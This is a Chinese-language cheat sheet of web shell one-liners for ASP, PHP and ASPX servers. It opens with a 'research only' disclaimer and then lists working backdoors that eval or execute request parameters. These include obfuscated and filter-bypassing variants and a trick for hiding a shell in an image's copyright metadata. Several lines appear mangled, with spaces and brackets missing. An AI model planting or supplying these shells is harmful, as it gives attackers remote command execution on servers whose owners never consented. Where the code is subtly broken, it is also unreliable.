声明:只做技术研究的分享,如果恶意使用造成任何法律责任概不负责!
一、asp一句话木马
<%eval request("CrAcK8")%>
<%executerequest("CrAcK8")%>
<%execute(request("CrAcK8"))%>
<%executerequest("CrAcK8")%><%'<% loop <%:%>
<%'<% loop <%:%><%executerequest("CrAcK8")%>
<%execute request("CrAcK8")'<%loop <%:%>[code]
[code]<script language=vbsrunat=server>eval(request("CrAcK8"))</script>
%><%Eval(Request(chr(35)))%><%
<%eval request("CrAcK8")%>
<%ExecuteGlobalrequest("CrAcK8")%>
ifRequest("CrAcK8")<>"" then ExecuteGlobalrequest("CrAcK8") end if
//容错代码
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' :Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>
二、ASP一句话图片格式木马
win7下右键图片,在属性->详细信息->版权内插入一句话即可。
三、php一句话木马
<?php eval($_POST1);?>
<?php if(isset($_POST['c'])){eval($_POST['c']);}?>
<?php system($_REQUEST1);?>
<?php ($_=@$_GET1).@$_($_POST1)?>
<?php eval_r($_POST1)?>
<?php @eval_r($_POST1)?> //容错代码
<?php assert($_POST1);?> //使用Lanker一句话客户端的专家模式执行相关的PHP语句
<?$_POST['c']($_POST['cc']);?>
<?$_POST['c']($_POST['cc'],$_POST['cc'])?>
<?php@preg_replace("/[email]/e",$_POST['h'],"error");?> /*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>
<?php echo `$_GET['r']` ?>
//绕过<?限制的一句话
<script language="php">@eval_r($_POST[sb])</script>
四、aspx一句话:
<scriptrunat=”server”>WebAdmin2Y.x.yaaaaa =newWebAdmin2Y.x.y
(“add6bb58e139be10″);</script>